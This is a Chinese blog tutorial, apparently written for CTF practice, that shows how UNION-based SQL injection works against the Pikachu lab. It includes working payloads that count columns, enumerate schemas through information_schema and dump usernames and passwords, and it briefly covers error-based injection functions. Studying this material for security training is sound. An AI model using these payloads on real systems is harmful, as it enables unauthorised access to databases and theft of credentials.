union注入

最新推荐文章于 2023-05-17 19:49:57 发布
最新推荐文章于 2023-05-17 19:49:57 发布
阅读量515 收藏 1
点赞数
分类专栏: CTF 文章标签: union查询
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43858799/article/details/88954806
版权

一、union注入
基于union的信息获取:

union联合查询:可以通过联合查询来查询指定的数据

用法举例:
select username,password from user where id =1 union select 字段1,字段2 from 表名

先登入PHPmyadmin 进入pikachu的数据库中
在这里插入图片描述
在这里插入图片描述

得到此结果 上述为一般查询
在这里插入图片描述

union查询:
在这里插入图片描述
在这里插入图片描述

除了通过遍历查询数据库内容外,还可以通过一下方法查询:
通过select database();来查询数据库的名称
在这里插入图片描述

在这里插入图片描述

通过select user();来查询数据库使用的用户名
在这里插入图片描述
在这里插入图片描述

通过select version();来查询数据库的版本
在这里插入图片描述
在这里插入图片描述
如果想要通过SQL注入可以通过以下方法:
在这里插入图片描述
在这里使用字符型注入来进行演示
由于我们无法知道数据库中有几个字段,所以需要通过猜测来判断字段数
下面可以通过order by来进行猜测
在这里插入图片描述
select id,email from member where username=‘allen’ order by 1; //通过第一列进行排序在这里插入图片描述

select id,email from member where username=‘allen’ order by 2; //通过第二列进行排序
在这里插入图片描述

select id,email from member where username=‘allen’ order by 3; //通过第三列进行排序
在这里插入图片描述
通过order by来进行列的排序 就可以清楚有多少个字段

让我们回到字符型注入

输入a’ order by 5 #后得到的结果 (这里用到了二分法)

在这里插入图片描述
得到下图时 ,就意味着order by 正常执行了 就可以知道有多少个字段了
在这里插入图片描述
接下来就可以进行union查询了

输入 a’ union select database(),user() #

就会显示数据库的名称和所用的用户名了
在这里插入图片描述
输入 a’ union select version(),4 #

就可以获取数据库的版本

由于必须要有两个字段 所以后面一个我们可以随意拼接一下
在这里插入图片描述
通过union查询来获得一下 数据库的基本信息 这就是union联合查询的作用

MySQL的小知识补充:information_schema
在MYSQL中,自带的information——schema 这个表中存放了大量的信息

获取数据库名(行话:爆库):
xxx’union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’#
1
获取表名(行话:爆表):

xxx’union select table_name,column_name from information_schema.columns where table_name=’users’#
1
获取列(行话:爆字段):

xxx’union select table_name,column_name from information_schema.columns where table_name=’users’#
1
获取密码(行话:爆数据):

xxx’union select username,password from users#

二、

三、基于函数报错的信息获取

常用的报错函数:updatexml() , extractvalue() , floor()

基于函数报错的信息获取(select/insert/update/delete)

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
Select 下报错的利用演示:
在这里插入图片描述

当我们构造一个错误的语法时 会返回报错信息
在这里插入图片描述

在这里插入图片描述
出现了报错
在这里插入图片描述
这里版本被吃掉了 所以需要通过使用concat()来显示
在这里插入图片描述
在这里插入图片描述

用相同的方法获取其他表的名称

数据库名称等:
在这里插入图片描述

在这里插入图片描述
返回的数据大于一行时
在这里插入图片描述
使用如下操作
在这里插入图片描述
获取所有表后再进行如下操作 获取字段
在这里插入图片描述
在这里插入图片描述

放羊的弔弔
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入union 联合注入
weixin_53711701的博客
01-16 4342
SQL注入union联合注入
【sql注入-union注入union函数 联合注入
07-11 7355
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
SQL显错(union注入基础深度剖析(原理)
m0_46304840的博客
03-03 2326
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入? sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
SQL注入学习之union联合查询注入
LTNSLALALA的博客
06-13 4295
文章主要是对SQL注入中基于union联合查询注入方式的实践记录。
SQL注入union联合注入
hobby云说
06-12 3592
特别申明 本文章仅供学习使用,其余利用本文章内容进行的任何行为与本人无关!做任何渗透操作前,请一定三思,做个遵纪守法的好公民! 简介 在初见SQL注入提到三种分类方式,其中一个是根据注入是否有回显来进行分类,本文将详细讲解有回显这类的注入方式。有有回显的注入,顾名思义,程序会将后端执行SQL查询语句的结果,返回显到页面中,通过各种巧妙的方式让各种你想要知道的关键信息显示在页面中。有回显的注入常见的有联合注入和报错注入,本文将详细讲解union联合注入。 正文 ...
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题。题目地址:https://ctf.bugku.com/challenges/detail/id/84.html?id=84&page=8 这道题可以有效的锻炼union注入和sqlmap的入门操作,...
后台Union注入绕过验证1
08-08
标题中的“后台Union注入绕过验证1”是指在Web应用程序中,攻击者通过利用SQL注入漏洞,特别是使用UNION查询的方式,绕过系统的身份验证机制。这种攻击手段常见于ASP编程语言构建的网站,因为描述中提到了ASP程序中...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SuperSQLInjectionV1:超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,直接操作TCP会话来进行HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;支持AccessMySQLSQLServerOraclePostgreSQLDB2SQLiteInformix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注
05-06
支持以盲注、错误显示、Union注入等方式来获取数据;支持Access/MySQL/SQLServer/Oracle/PostgreSQL/DB2/SQLite/Informix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过注入防护。本工具为...
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
sql注入实战—union注入
qq_40909772的博客
07-12 757
测试网站:自建靶场 http://192.168.57.128:1237/sql/union.php?id=1 测试工具:Burp Suite 1.注入过程。 1.1 访问该地址使用burp抓包,返回的结果如下。 1.2 在URL后添加一个单引号,再次访问,返回的结果与id=1不相同。 1.3 继续修改URL,访问id=1 and 1=1,由于and 1=1为真,所以页面应返回与id=1相同的结果,访问id=1 and 1=2,由于and 1=2为假,所以页面应返回与id=1不同的结果,如下图所示。   由
buuctf love sql 保姆级攻略,看完就会,5分钟速成union联合注入
weixin_74320581的博客
05-17 414
buuctf love sql 从0到1 保姆级攻略
SQL注入系列篇之union联合注入
d59hao的博客
04-27 703
union注入攻击,通过unionunion all连接,将自己写的SQL拼接到原始SQL中,从而达到执行任意SQL语句的效果。
简单联合union查询注入
vcdy
06-02 9180
联合查询有前提  必须有显示位 用sql-labs来学习这是第一个http://127.0.0.1/sqli-labs/Less-1/?id=1一、判断是否用'做字符串引号http://127.0.0.1/sqli-labs/Less-1/?id=1'and 1=1 --+正常输出出错代表没有闭合  说明没有用'  可能没有用' 或用了"或()二、判断它所在的数据库有几列http://127.0....
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。 SQL注入的分类 根据SQL数据类型分类 整型注...
union注入 (Error based)
soldi_er的博客
02-28 266
文章目录探测漏洞利用漏洞基础补充 探测漏洞 GET参数id 重点在于系统是否执行了我们输入的语句 单引号:?id=1’ 逻辑:对比两个页面 ?id=1 and 1=1和?id=1 and 1=2(数字型注入) ?id=1’ and ‘1’=‘1和?id=1’ and ‘1’='2(字符型注入) 加减:对比两个页面 ?id=2-1和?id=1 利用漏洞 基础   联合注入条件:有回显位。知道字段数。   联合注入语句: 查字段:?id=1’ order by x#(查询有结果才能排序) 联合:?id=0’
sql注入——union联合注入
hintll的博客
06-22 1005
sql注入——union联合注入 union注入是sql注入的一大类型 在做有关sql联合注入时一般用以下思路进行解题: 1.首先要找到能与数据库交互的注入点: 2.测试字段的数量,判断SQL语句查询列数: 在这里我们使用的命理是order by 通常构造:?id=1’ order by sum–+ 和 1’ order by sum# 这里的sum指代的是数字从1开始逐个测试直至3回显有报错为止: ?id=1’ order by 1–+ ?id=1’ order by 2–+ ?id=1’ orde
SQL注入攻击-高级方法,手动注入 自动化注入
11-17
SQL注入攻击-高级方法,手动注入 自动化注入 union 注入 报错注入 union 注入

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值